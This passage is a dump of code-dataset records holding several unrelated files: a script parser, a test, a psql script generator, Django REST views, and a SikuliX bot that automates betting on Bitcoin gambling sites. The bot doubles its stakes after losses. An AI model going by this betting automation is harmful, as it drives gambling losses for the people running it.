' '*len(punc)))\n#\n# # split into words\n# words = script.split()\n#\n# # print(words)\n#\n# data = []\n# speaker = ''\n# speech = []\n# for word in words:\n# if word.isupper() and len(word) > 1 and word not in caps_exclusions:\n# if len(speech) > 0:\n# data.append(Line(speaker,speech))\n# speech = []\n# speaker = word.lower()\n# else:\n# speaker += word.lower()\n# else:\n# speech.append(word.lower())\n# data.append(Line(speaker,speech))\n# return data\n#\n# if __name__ == \"__main__\":\n# data = get_lines('./Seinfeld Scripts/S01E01.txt')\n# class Speaker:\n# def __init__(self,name):\n# self.name = name\n# self.count = 1\n# speakers = []\n# for line in data:\n# found = False\n# for speaker in speakers:\n# if speaker.name == line.speaker:\n# speaker.count += 1\n# found = True\n# continue\n# if found:\n# continue\n# else:\n# speakers.append(Speaker(line.speaker))\n#\n# for speaker in speakers:\n# print(speaker.name,':',speaker.count)\n","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"111714068","text":"import os\nimport unittest\nfrom supervised.utils.learning_curves import LearningCurves\n\n\nclass LearningCurvesTest(unittest.TestCase):\n def test_plot_close(self):\n \"\"\"\n Test if we close plots. To avoid following warning:\n RuntimeWarning: More than 20 figures have been opened.\n Figures created through the pyplot interface (`matplotlib.pyplot.figure`)\n are retained until explicitly closed and may consume too much memory.\n \"\"\"\n for _ in range(\n 1\n ): # you can increase the range, for tests speed reason I keep it low\n LearningCurves.plot_for_ensemble([3, 2, 1], \"random_metrics\", \".\")\n\n os.remove(LearningCurves.output_file_name)\n","sub_path":"tests/tests_utils/test_learning_curves.py","file_name":"test_learning_curves.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"113164143","text":"import os\n\nimport analystApi.api_basic\nfrom analystApi.api_basic import immobrain_search_query\n\n\ndef write_to_file(output_filename, columns, values_to_add):\n (basename, fileext) = os.path.splitext(output_filename)\n tablename = os.path.basename(basename)\n lines = construct_file_content(tablename, output_filename, columns, values_to_add)\n with open(basename + '.psql', 'w') as psql_file:\n psql_file.writelines(lines)\n\n\ndef construct_file_content(tablename, filename, columns, values_to_add):\n column_lines = construct_column_definitions(columns, values_to_add)\n lines = f\"\"\"\npsql -c 'DROP TABLE IF EXISTS {tablename};'\n\npsql -c 'CREATE TABLE {tablename}\n(\n{column_lines}\n)'\n\n# CSV einlesen..\npsql -c \"\\\\copy {tablename} from {filename} delimiter ',' csv header;\"\n\n# Georef anreichern...\npsql -c \"INSERT INTO georef SELECT id,adresse,\n (query::json->'peripherySpatialFilter'->'coordinate'->'lat')::text::numeric oadr_koord_lat_epsg4326,\n (query::json->'peripherySpatialFilter'->'coordinate'->'lon')::text::numeric oadr_koord_lon_epsg4326 \n FROM {tablename} WHERE precision='HOUSE'\n ON CONFLICT DO NOTHING\"\n \n\"\"\"\n return lines\n\n\ndef construct_column_definitions(columns, values_to_add):\n if not analystApi.api_basic.column_documentation:\n immobrain_search_query.load_variable_documentation()\n\n # lowercase copy of columns\n cols = [x.lower() for x in columns]\n\n col_id = 'id'\n basic_cols = {\n col_id: 'text NOT NULL',\n 'adresse': 'text NOT NULL',\n 'adresse::distance': 'numeric',\n 'adresse::mincount': 'integer',\n 'adresse::maxdistance': 'integer',\n 'segment': 'text',\n }\n\n if not contains(col_id, cols):\n raise Exception(f'Must contain {col_id} column')\n\n lines = []\n\n # Handle all columns\n while cols:\n col: str = cols.pop(0) # Remove first element\n if col in [k.lower() for k in basic_cols]:\n for col_name, col_type in basic_cols.items():\n if col == col_name.lower():\n append_col(lines, col_name, col_type)\n break\n else:\n col_filter = immobrain_search_query.get_filter_for_column(col)\n if col_filter is None:\n col_type = 'text'\n else:\n if col.endswith('includeunknown'):\n col_type = 'boolean'\n else:\n col_type = col_filter.get_sql_type()\n\n append_col(lines, col, col_type)\n\n lines.append('')\n lines.append('results_start_here text,')\n lines.append('')\n lines.append('queryid bigint,')\n lines.append('distance_used numeric,'),\n lines.append('precision text,'),\n lines.append('query json,'),\n lines.append('')\n\n for v in values_to_add:\n lines.append(f'\"{v}\" numeric,')\n\n lines.append('')\n lines.append(f'PRIMARY KEY (\"{col_id}\")')\n\n lines_string = '\\n'.join([f' {line}' for line in lines])\n # remove last comma\n return lines_string\n\n\ndef append_col(lines, name, col_type):\n lines.append(f'\"{name}\" {col_type},')\n\n\ndef append_col_and_remove_if_exists(lines, name, col_type, columns_lowercase):\n if contains(name, columns_lowercase):\n lines.append(f'\"{name}\" {col_type},')\n remove(name, columns_lowercase)\n\n\ndef contains(needle, haystack_lowercase):\n return needle.lower() in haystack_lowercase\n\n\ndef remove(needle, haystack_lowercase):\n haystack_lowercase.remove(needle.lower())\n","sub_path":"Python/analystApi/psql_writer.py","file_name":"psql_writer.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"295863596","text":"from Indigo7.models import IBT\nfrom django.db import models\nfrom Addresses.models import Address, Addresstypes\n\nclass Addresses_linkManager(models.Manager):\n\n def create_adress_from_customer_and_type(self, customer, adressid, adresstypeno):\n address_rec, addresstype = self.get_adress_from_customer_and_type(\n customer, adresstypeno)\n address_rec.pk=None\n address_rec.masterdata = False\n address_rec.addressid = address_rec.addressid + ' ' + addresstype.addresstype + ' ' + str(adressid) \n address_rec.save() \n return address_rec\n\n def get_adress_from_customer_and_type(self,customer, adresstypeno):\n addresstype = Addresstypes.objects.get(adresstypeno=adresstypeno) \n address_link, created = Addresses_link.objects.get_or_create(customer=customer, addresstype=addresstype)\n if created is True:\n address, created = Address.objects.get_or_create(addressid=customer.customer)\n address_link.address = address\n address_link.save() \n \n return Address.objects.get(id= address_link.address.id), addresstype\t\n\n\n\nclass Addresses_link(IBT):\n\n addresstype = models.ForeignKey('Addresses.Addresstypes',null=True) \n address = models.ForeignKey('Addresses.Address', null=True) \n customer = models.ForeignKey('Customer', null=True, related_name='+') \n\n objects = Addresses_linkManager()\n\n def __unicode__(self): \n return u'%s %s %s' % (self.addresstype, self.address.addressid, self.customer.name)\n\n class Meta:\n ordering = ['addresstype'] \n app_label = 'Customers'","sub_path":"Customers/models/address_link.py","file_name":"address_link.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"393188694","text":"# This Python file uses the following encoding: utf-8\nimport random\nimport math\nfrom sikuli import *\n# ************** Settings ****************************\n\nSettings.DelayAfterDrag = 0.2\nSettings.DelayBeforeDrag = 0.2\nSettings.MoveMouseDelay = 0\n\nversion = 0.12\nsubstract = 1\n\n# ************** Handlers ****************************\nhotKeyX = False # global to communicate with main loop\ndef xHandler(event):\n global hotKeyX\n hotKeyX = True\nEnv.addHotkey(\"x\", KeyModifier.CTRL + KeyModifier.SHIFT, xHandler)\n\n# ************** Regions ****************************\naddressRegion = Region(Region(16,38,1878,127))\nregionResult = Region(Region(315,179,1270,852))\nchattingRegion = Region(Region(57,990,346,31))\n\n# ************** End initialization ****************************\n\n# 1. freebitco.in \n# 2. freedoge.co.in\ndef showROI(faucet=\"freebitco.in\"):\n global workingOnFaucet\n global gambling\n gambling = False\n workingOnFaucet = faucet\n isStarted = True\n if exists(\"1524773343945.png\"):\n gambling = True\n title = Region(Region(4,113,1916,912))\n title.highlight(1)\n\n if exists(\"1523959349312.png\"):\n popup(str(getBalancePD()))\n try:\n if faucet == \"freebitco.in\":\n title = addressRegion.exists(\"1523401446432.png\")\n exists(Pattern(\"1523137491957.png\").similar(0.57)).click(Pattern(\"1523137491957.png\").similar(0.55).targetOffset(49,-1))\n getBetField()\n else:\n title = addressRegion.exists(Pattern(\"1521896762577.png\").similar(0.49))\n exists(Pattern(\"1523137491957.png\").similar(0.57)).click(Pattern(\"1523137491957.png\").similar(0.55).targetOffset(49,-1))\n getBetField()\n except AttributeError:\n title = addressRegion.exists(Pattern(\"1521302065814.png\").similar(0.53))\n try:\n ROI = Region(title.x, title.y, title.w + 1000, title.w + 1500)\n ROI.highlight(1)\n except:\n pass\n \n\ndef stopApp():\n popup(\"Processing Shift+Ctrl+X key: stopping\")\n exit()\n\n# Use only in freebitcoin\ndef isLost():\n recognize = Region(Region(805,564,289,38)).text()\n result = str(recognize).find(\"lose\")\n if result > 0:\n return True\n else:\n return False\n \n# Known sites like freebitcoin\ndef getBalance():\n global substract\n currentBalance = balance\n return currentBalance\n\n# Using to recognize site PrimeDice\ndef getBalancePD():\n PDBalance = Region(1194,122,172,48).text()\n return PDBalance\n\ndef getBalanceByRecognize():\n cycle = 0\n try:\n tit = find(Pattern(\"1523137656416.png\").similar(0.77))\n regionBalance = Region(tit.x - 20, tit.y, 200, tit.h)\n \n s = regionBalance.text()\n \n newBalance = str(s)\n newConvert = \"\"\n for letter in newBalance:\n \n if cycle >= 11:\n if letter.isdigit() or letter == '.':\n newConvert = newConvert + letter\n #popError(newConvert)\n cycle += 1\n \n convertedInteger = newConvert\n #popError(str(convertedInteger))\n if float(convertedInteger) == 0:\n popError(\"Not enought balance.\")\n exit()\n return convertedInteger\n except ValueError as e:\n print(e)\n #popError(\"Error recognizing balance: {}\".format(e.args))\n isPlaying = False\n return 0\n\n# Recognition to screen element, then click below\ndef getBetField():\n try:\n title = exists(\"BEFAMOUNT.png\")\n title.click(Pattern(\"BEFAMOUNT.png\").targetOffset(66,37))\n regionBet = Region(title.x + 50, title.y + 30, title.w + 45, 35)\n return regionBet.text()\n except Exception:\n click(Pattern(\"BETODDS.png\").targetOffset(260,-154))\n \ndef set_odds(odds):\n title = exists(\"BEFAMOUNT.png\")\n title.doubleClick(Pattern(Pattern(\"BEFAMOUNT.png\").targetOffset(10,178)))\n paste(str(odds))\n\n# Returns total rolls was made during last session\ndef get_rolls():\n return rolls\n\n# Converts floating point to smallest bitcoin part.\ndef fixNumber(x):\n return '{:.8f}'.format(float(x))\n\n# Strategy, where random choose between two values.\ndef RandomBetHiLo(waitingTime=0.5):\n # 0001 0001 0101 1110 1001\n rndNum = random.randint(0, 1)\n if rndNum == 0:\n type(\"H\")\n else:\n type(\"L\")\n wait(waitingTime)\n\n# Strategy, where opposite to last win is choosen.\ndef OppositeToLastWin(waitingtime=0.5):\n global lastVictoryHiLo\n type(lastVictoryHiLo)\n wait(waitingtime)\n\ndef check_requirements(value, limit = 0.15): \n if value < limit:\n value = limit\n return value\n\ndef presetload_autobet():\n try:\n if exists(\"PAYOUT.png\"):\n click(Pattern(\"PAYOUT.png\").targetOffset(421,-265))\n wait(0.1)\n doubleClick(Pattern(\"BASEBET.png\").similar(0.91).targetOffset(86,0))\n wait(0.3)\n #type(\"A\", KeyModifier.CTRL)\n paste(\"0.00000025\")\n wait(0.3)\n type(Key.TAB)\n type(Key.TAB)\n type(\"A\", KeyModifier.CTRL)\n type(\"3\")\n wait(0.1)\n type(Key.TAB)\n paste(\"10000000\")\n wait(0.1)\n click(Pattern(\"ONLOSEONWIN.png\").targetOffset(55,-1))\n wait(0.2)\n type(Key.TAB)\n type(Key.TAB)\n type(Key.SPACE)\n type(Key.TAB)\n type(\"A\" , KeyModifier.CTRL)\n type(\"200\")\n wait(0.2)\n type(Key.TAB)\n type(Key.SPACE)\n type(Key.TAB)\n type(\"A\" , KeyModifier.CTRL)\n type(\"3\")\n type(Key.TAB)\n type(Key.TAB)\n type(Key.TAB)\n type(Key.TAB)\n type(Key.SPACE)\n type(Key.TAB)\n type(Key.SPACE)\n\n except:\n popup(\"Error during auto bet settings\")\n\ndef between(value, a, b):\n # Find and validate before-part.\n pos_a = value.find(a)\n if pos_a == -1: return \"\"\n # Find and validate after part.\n pos_b = value.rfind(b)\n if pos_b == -1: return \"\"\n # Return middle part.\n adjusted_pos_a = pos_a + len(a)\n if adjusted_pos_a >= pos_b: return \"\"\n return value[adjusted_pos_a:pos_b]\n\ndef after(value, a):\n # Find and validate first part.\n pos_a = value.rfind(a)\n if pos_a == -1: return \"\"\n # Returns chars after the found string.\n adjusted_pos_a = pos_a + len(a)\n if adjusted_pos_a >= len(value): return \"\"\n return value[adjusted_pos_a:]\n\ndef before(value, a):\n # Find first part and return slice before it.\n pos_a = value.find(a)\n if pos_a == -1: return \"\"\n return value[0:pos_a]\ndef getbustoBitMultiplier():\n mbits_multiplier = str(Region(Region(97,335,538,135)).text())\n #recognize = between(mbits_multiplier,\"@\",\"x\")\n return mbits_multiplier \n\ndef getbustoBitBalance():\n mbits_balance = str(Region(Region(1739,124,128,35)).text())\n #newConverted = after(mbits_balance, \"BITS:\")\n #newConvertedBefore = before(newConverted, \".\")\n try:\n recognize = between(mbits_balance,\":\",\".\")\n except ValueError:\n recognize = after(mbits_balance,\"BITS:\")\n newConvertedNoSpace = recognize.replace(\" \",\"\")\n newConverted = int(newConvertedNoSpace.replace(\",\",\"\"))\n return newConverted\n\ndef chat(write_text):\n if DEBUG_CHAT is True:\n if Region(Region(1157,591,91,371)).exists(\"1525141408338.png\"):\n chattingRegion.click()\n chattingRegion.paste(write_text)\n chattingRegion.type(Key.ENTER)\n print(\"[CHAT] {}\".format(write_text))\n else:\n print(\"[DEBUG] {}\".format(write_text))\n \ndef starting_values():\n global rolls\n global timerMod\n global active\n global lastVictoryHiLo\n global lastBalance\n global countKeyPressed\n global lostTimes\n global zazor\n global isStarted\n global oddTimesCount\n global oddTimes\n global starting3\n global balance\n global rateup\n global maxLost\n global startingBet\n global strategy\n global initStartingBet\n global GAME_IN_PROGRESS\n global won\n global NUMLOSE_TO_START_WAITING\n global FIRST_GAME\n global DEBUG_CHAT\n global PAYOUT\n global INIT_PAYOUT\n\n PAYOUT = 1.5\n INIT_PAYOUT = 2\n FIRST_GAME = True\n DEBUG_CHAT = False\n NUMLOSE_TO_START_WAITING = 6\n won = True\n loss_in_row = 0\n strategy = 0\n GAME_IN_PROGRESS = False\n\n startingBet = 0\n initStartingBet = 0\n rateup = 2\n maxLost = 0 \n balance = 0\n starting3 = False\n oddTimes = 2\n oddTimesCount = 0\n isStarted = True\n zazor = False\n lostTimes = 0\n rolls = 0\n countKeyPressed = 0\n timerMod = 0\n active = False\n lastVictoryHiLo = \"H\"\n regionResult.setFindFailedResponse(PROMPT)\n\n showROI(\"primedice.com\")\n\n if workingOnFaucet == \"primedice.com\":\n print(workingOnFaucet)\n print(\"Starting balance: {}\".format(getBalancePD()))\n else:\n print(\"Starting balance: {}\".format(getBalance()))\n\n\nstarting_values()\n\n# User interactions to choose special values for loop\nif gambling is False:\n strategy = int(input(\"Choose strategy: [1] Random(easy), [2] Opposite(medium), [3] Special(hard)\", '1'))\n \n \nif strategy == 4:\n presetload_autobet()\n popup(\"Done, settings placed\")\n\nif gambling is False:\n balance = float(input(\"Enter your balance\", \"0\"))\n distance = int(input('Write distance before start multiplier. Default is 1', '1'))\n boting_speed = float(input(\"Write for bot in floating point value of milliseconds, Default is 0.5, i.o. 500 ms\", \"0.5\"))\n rates = float(input(\"Writes rates\", \"7.5\"))\n check_requirements(boting_speed, 0.2)\n popup(\"To stop script during play, press CTRL+SHIFT+X\")\n \nif strategy == 3:\n set_odds(rates)\n rateup = rates\n\nif gambling is True:\n lastBalance = getbustoBitBalance()\n print(\"Starting gambling balance is {}\".format(str(getbustoBitBalance())))\n initStartingBet = int(input(\"Enter starting bet...\",\"1\"))\n startingBet = initStartingBet\n NUMLOSE_TO_START_WAITING = int(input(\"Enter amount lose in a row, to start waiting\", \"6\"))\n# Starting loop\nwhile True:\n if not isStarted:\n stopApp()\n if hotKeyX:\n stopApp()\n\n \n if gambling is True:\n rolls += 1\n \n chat(\"Cycle #{} started\".format(rolls))\n chat(\"I can make bet {oc}, {oc2} times\".format(oc = initStartingBet, oc2 = str(getbustoBitBalance() // initStartingBet)))\n #GAME_IN_PROGRESS = False\n\n lastBalance = getbustoBitBalance()\n if Region(645,214,632,242).exists(\"1524845425338.png\") and GAME_IN_PROGRESS is False:\n if Region(645,214,632,242).exists(\"BETTING.png\"):\n wait(1)\n else:\n \n Settings.MoveMouseDelay = 0.3\n wait(1.5)\n \n \n click(Pattern(\"MANUAL-1.png\").targetOffset(-236,61))\n wait(0.3)\n type(\"a\" , KeyModifier.CTRL)\n if won is False:\n startingBet = int(startingBet * 2.5)\n lostTimes += 1\n PAYOUT = INIT_PAYOUT\n if lostTimes == 4:\n startingBet *= int(1.3)\n PAYOUT = 1.66\n if won is True:\n startingBet = initStartingBet\n lostTimes = 0\n PAYOUT = PAYOUT + 0.5\n wait(0.3)\n if getbustoBitBalance() > startingBet:\n type(str(startingBet))\n type(Key.TAB)\n type(\"a\" , KeyModifier.CTRL)\n type(str(PAYOUT))\n else:\n chat(\"Not enough balance to make a bet.\")\n startingBet = int(getbustoBitBalance() / 3)\n type(str(startingBet))\n type(Key.TAB)\n type(\"a\" , KeyModifier.CTRL)\n type(str(INIT_PAYOUT))\n Settings.MoveMouseDelay = 0\n \n if lostTimes < NUMLOSE_TO_START_WAITING and GAME_IN_PROGRESS is False:\n click(Pattern(\"MANUAL-1.png\").targetOffset(-66,176))\n GAME_IN_PROGRESS = True\n else:\n chat(\"starting to observe\")\n while not Region(23,191,609,352).exists(\"1524846029417.png\"):\n wait(0.3)\n GAME_IN_PROGRESS = True\n else:\n #if between(Region(Region(95,340,536,110)).text(),\"@\",\"x\") > 2:\n if before(Region(Region(145,595,148,38)).text(),\"x\") > 2: \n chat(before(Region(Region(145,595,148,38)).text(),\"x\"))\n lostTimes = 0\n wait(1)\n click(Pattern(\"MANUAL-1.png\").targetOffset(-66,176))\n else:\n lostTimes = NUMLOSE_TO_START_WAITING\n GAME_IN_PROGRESS = False\n\n while not Region(23,191,609,352).exists(\"1524846029417.png\") and GAME_IN_PROGRESS is True:\n wait(0.3)\n else:\n\n if lastBalance < getbustoBitBalance():\n\n print(\"sentences {} < {}\".format(str(lastBalance),str(getbustoBitBalance())))\n won = True\n print(\"LastBalance:{} NewBalance Won: {}\".format(lastBalance, getbustoBitBalance()))\n\n if lastBalance > getbustoBitBalance():\n\n print(\"sentences {} > {}\".format(str(lastBalance),str(getbustoBitBalance())))\n won = False\n print(\"Loss, {}\".format(getbustoBitBalance()))\n chat(\"Game #{oc} has ended with balance of {oc2} bits.\".format(oc=str(rolls), oc2=str(getbustoBitBalance())))\n GAME_IN_PROGRESS = False\n\n print(\"Loss in a row {}\".format(str(lostTimes)))\n wait(0.5)\n \n FIRST_GAME = False\n else:\n lastBalance = float(getBalance())\n print(\"Roll {}, balance: {}\".format(get_rolls(), getBalance()))\n if strategy == 1:\n RandomBetHiLo(boting_speed)\n if strategy == 2:\n OppositeToLastWin(boting_speed)\n if strategy == 3:\n if not starting3:\n set_odds(rateup)\n starting3 = True\n getBetField()\n RandomBetHiLo(boting_speed) \n \n #if float(getBalance()) < lastBalance:\n if isLost():\n print(\"current {} < {} from last bet = LOST\".format(fixNumber(getBalancePD()), fixNumber(lastBalance)))\n lostTimes += 1\n if maxLost < lostTimes:\n maxLost = lostTimes\n if lostTimes >= distance:\n type(\"S\")\n substract *= 2\n zazor = True\n if lastVictoryHiLo == \"H\":\n lastVictoryHiLo = \"L\"\n else:\n lastVictoryHiLo = \"H\"\n else:\n print(\"current {} > {} from last bet = VICTORY\".format(fixNumber(getBalancePD()), fixNumber(lastBalance)))\n if not zazor:\n lostTimes = 0\n lostTimes = 0\n type(\"D\")\n substract = balance - (0.00000001 * substract) \n if strategy == 3: \n set_odds(rateup)\n #type(\"EQ\")\n oddTimesCount = 0\n getBetField()\n if strategy != 3:\n \n if timerMod <= 0:\n if active:\n type(\"W\")\n active = False\n timerMod = 5\n else:\n type(\"Q\")\n active = True\n timerMod = 5\n timerMod -= 1\n else:\n if timerMod <= 0:\n \n oddTimesCount += 1\n if oddTimesCount > 10:\n set_odds(2)\n getBetField() \n timerMod = 3\n else:\n type(\"W\")\n if oddTimesCount > 12:\n rateup = rateup + 1\n set_odds(rateup)\n getBetField()\n oddTimesCount = 0\n timerMod = 2\n else:\n timerMod = 3\n timerMod -= 1 ","sub_path":"presetLite.sikuli/presetLite.py","file_name":"presetLite.py","file_ext":"py","file_size_in_byte":16478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"517623830","text":"from django.shortcuts import render, HttpResponse\nfrom django.contrib.auth import authenticate\n\nfrom ..models.profile import Profile\nfrom django.contrib.auth.models import User\n\nfrom rest_framework import status, permissions\nfrom rest_framework.parsers import JSONParser \nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.models import Token\n\nfrom ..permissions import AllowOnlyAdminFASTUR, AllowOnlyAdminHUMAS, AllowOnlyAdminPKM, AllowOnlyMahasiswa\n\nfrom ..models.humas import PerizinanPublikasi, PermintaanProtokoler, PermintaanSouvenir, JenisPublikasi, Souvenir, JenisIzinPublikasi\nfrom ..models.izin_kegiatan import IzinKegiatan\n\nfrom ..serializers.humas_serializer import PermintaanSouvenirHumasSerializer,PerizinanPublikasiSerializer,PermintaanProtokolerSerializer, PerizinanKegiatanSerializer, JenisPublikasiSerializer,SouvenirSerializer,PerizinanPublikasiSerializer, PerizinKegiatanHumasSerializer, JenisIzinPublikasiSerializer,JenisIzinPublikasiHumasSerializer, PermintaanSouvenirSerializer\n\nfrom django.utils import timezone\nfrom django.http.response import JsonResponse\nfrom rest_framework.decorators import parser_classes\nfrom rest_framework.parsers import MultiPartParser, FormParser\n\n@api_view(['GET'])\n@permission_classes([AllowOnlyAdminHUMAS]) #admin humas\ndef get_list_perizinan_humas(request): \n if request.method == 'GET': # get list seluruh izin kegiatan (humas)\n list_izin_kegiatan = IzinKegiatan.objects.filter(status_perizinan_kegiatan=2)\n list_izin_kegiatan_serialized = PerizinKegiatanHumasSerializer(list_izin_kegiatan, many=True)\n return JsonResponse(list_izin_kegiatan_serialized.data, safe=False)\n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['GET', 'POST'])\n@permission_classes([AllowOnlyAdminHUMAS | AllowOnlyMahasiswa]) #mahasiswa dan admin humas\ndef get_post_perizinan_humas_by_id_izin_kegiatan(request,id_izin_kegiatan):\n try: \n izin_kegiatan =IzinKegiatan.objects.get(pk=id_izin_kegiatan)\n except:\n return JsonResponse({'message': 'Izin kegiatan tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'POST':\n permintaan_data = JSONParser().parse(request)\n permintaan_humas_serialized = PerizinanKegiatanSerializer(izin_kegiatan, data = permintaan_data)\n if permintaan_humas_serialized.is_valid():\n permintaan_humas_serialized.save()\n return JsonResponse(permintaan_humas_serialized.data,safe=False)\n return JsonResponse(permintaan_humas_serialized.errors, status = status.HTTP_400_BAD_REQUEST)\n\n if request.method == 'GET': # get izin kegiatan (humas)\n detail_perizinan_humas_kegiatan_serialized = PerizinKegiatanHumasSerializer(izin_kegiatan)\n return JsonResponse(detail_perizinan_humas_kegiatan_serialized.data, safe=False)\n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['PUT',])\n@permission_classes([AllowOnlyAdminHUMAS]) #admin humas \ndef update_permintaan_souvenir_by_id_permintaan_souvenir(request, id_permintaan):\n try:\n permintaan_souvenir =PermintaanSouvenir.objects.get(pk=id_permintaan)\n except:\n return JsonResponse({'message': 'Permintaan souvenir tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'PUT':\n peminjaman_data = JSONParser().parse(request) \n try:\n permintaan_souvenir.status_permintaan_souvenir = peminjaman_data['status_permintaan_souvenir']\n permintaan_souvenir.updated_at = timezone.now()\n if peminjaman_data['alasan_penolakan'] is not None:\n permintaan_souvenir.alasan_penolakan = peminjaman_data['alasan_penolakan']\n permintaan_souvenir.save()\n return JsonResponse(PermintaanSouvenirHumasSerializer(permintaan_souvenir).data, safe=False)\n except:\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST)\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST) \n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['PUT',])\n@permission_classes([AllowOnlyAdminHUMAS]) #admin humas\ndef update_permintaan_protokoler_by_id_permintaan_protokoler(request, id_permintaan):\n try:\n permintaan_protokoler = PermintaanProtokoler.objects.get(pk=id_permintaan)\n except:\n return JsonResponse({'message': 'Permintaan protokoler tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'PUT':\n peminjaman_data = JSONParser().parse(request) \n try:\n permintaan_protokoler.status_permintaan_protokoler = peminjaman_data['status_permintaan_protokoler']\n permintaan_protokoler.updated_at = timezone.now()\n if peminjaman_data['alasan_penolakan'] is not None:\n permintaan_protokoler.alasan_penolakan = peminjaman_data['alasan_penolakan']\n permintaan_protokoler.save()\n return JsonResponse(PermintaanProtokolerSerializer(permintaan_protokoler).data, safe=False)\n except:\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST)\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST) \n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['PUT',])\n@permission_classes([AllowOnlyAdminHUMAS]) #nanti diganti jadi admin humas\ndef update_jenis_izin_publikasi_by_id_jenis_izin_publikasi(request, id_jenis_izin_publikasi):\n try:\n jenis_izin_publikasi = JenisIzinPublikasi.objects.get(pk=id_jenis_izin_publikasi)\n except:\n return JsonResponse({'message': 'Jenis izin publikasi tidak ada'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'PUT':\n perizinan_data = JSONParser().parse(request) \n try:\n jenis_izin_publikasi.status_perizinan_publikasi = perizinan_data['status_perizinan_publikasi']\n if perizinan_data['alasan_penolakan'] is not None:\n jenis_izin_publikasi.alasan_penolakan = perizinan_data['alasan_penolakan']\n jenis_izin_publikasi.save()\n jenis_izin_publikasi_serialized = JenisIzinPublikasiHumasSerializer(jenis_izin_publikasi)\n try:\n perizinan_publikasi = PerizinanPublikasi.objects.get(pk=perizinan_data['id_perizinan_publikasi'])\n perizinan_publikasi.updated_at= timezone.now()\n perizinan_publikasi.save()\n except:\n pass\n return JsonResponse(JenisIzinPublikasiHumasSerializer(jenis_izin_publikasi).data, safe=False)\n except:\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST)\n return JsonResponse({'message': 'Terjadi kesalahan'}, status=status.HTTP_400_BAD_REQUEST) \n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['POST'])\n@permission_classes([AllowOnlyMahasiswa]) #mahasiswa\n@parser_classes([MultiPartParser, FormParser])\ndef post_perizinan_publikasi(request):\n if request.method == 'POST': # post perizinan_publikasi\n perizinan_data_serialized = PerizinanPublikasiSerializer(data=request.data)\n if perizinan_data_serialized.is_valid():\n perizinan_data_serialized.save()\n \n # menyimpan jenis_izin_publikasi dari list jenis_publikasi\n jenis_publikasi_string = request.data['jenis_publikasi']\n print(request.data['jenis_publikasi'])\n print(jenis_publikasi_string)\n if jenis_publikasi_string != '':\n jenis_publikasi_list = [data.strip() for data in jenis_publikasi_string.split(',')]\n for jenis_publikasi in jenis_publikasi_list: # menyimpan setiap jenis_izin_publikasi\n jenis_izin_publikasi_data = {\n \"jenis_publikasi\" : jenis_publikasi,\n \"status_perizinan_publikasi\": \"1\",\n \"alasan_penolakan\": ''\n }\n jenis_izin_publikasi_serialized = JenisIzinPublikasiSerializer(PerizinanPublikasi.objects.last(),data=jenis_izin_publikasi_data)\n if jenis_izin_publikasi_serialized.is_valid():\n jenis_izin_publikasi_serialized.save()\n \n return JsonResponse(perizinan_data_serialized.data,status=status.HTTP_201_CREATED,safe=False)\n return JsonResponse(perizinan_data_serialized.errors, status=status.HTTP_400_BAD_REQUEST)\n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['GET'])\n@permission_classes([AllowOnlyAdminHUMAS | AllowOnlyMahasiswa ]) #mahasiswa dan admin humas\ndef get_jenis_publikasi(request):\n if request.method == 'GET':\n list_jenis_publikasi = JenisPublikasi.objects.all()\n list_jenis_publikasi_serialized = JenisPublikasiSerializer(list_jenis_publikasi, many=True)\n return JsonResponse(list_jenis_publikasi_serialized.data,safe=False)\n \n #case for else\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['GET'])\n@permission_classes([AllowOnlyAdminHUMAS | AllowOnlyMahasiswa ]) # mahasiswa dan admin humas\ndef get_list_souvenir(request):\n if request.method == 'GET':\n list_souvenir = Souvenir.objects.all()\n list_souvenir_serialized = SouvenirSerializer(list_souvenir, many=True)\n return JsonResponse(list_souvenir_serialized.data,safe=False)\n\n \n #case for else\n\n return JsonResponse({'message' : 'invalid API method'}, status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n@api_view(['POST'])\n@permission_classes([AllowOnlyAdminHUMAS])\ndef post_souvenir(request):\n if request.method == 'POST':\n souvenir_data = JSONParser().parse(request)\n souvenir_serializer = SouvenirSerializer(data=souvenir_data)\n if souvenir_serializer.is_valid():\n souvenir_serializer.save()\n return 